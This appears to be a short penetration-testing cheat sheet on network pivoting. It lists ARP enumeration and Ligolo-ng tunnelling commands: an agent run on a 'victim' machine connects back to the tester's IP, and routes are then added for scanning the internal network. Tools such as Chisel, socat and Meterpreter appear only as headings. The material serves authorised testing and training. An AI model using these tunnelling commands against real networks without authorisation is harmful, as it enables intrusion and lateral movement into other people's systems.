Pivoting / Forwarding
00. Basic Enumerations
## ------------------| Check arp table
arp -an01. Port Forwarding
01.0 Ligolo-ng
## ------------------| Agent [target/victim computer]
.\agent.exe -connect <MyIP>:11601 -ignore-cert
## ------------------| Server [My Computer]
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
session
ifconfig
sudo ip route add <IPRange>/24 dev ligolo
start
nmap <IP>01.1 SSH Port Forward
01.2 Socat Multipurpose relay
01.3 Using Chisel
01.4 Using sshuttle
01.5 Using ncat tunnel
01.6 Using httptunnel
01.7 Using Plink.exe
01.8 Using netsh.exe
01.9 Using rinetd
01.10 Using rpivot.exe [Best for Windows XP]
01.11 Using Metasploit with Meterpreter
Last updated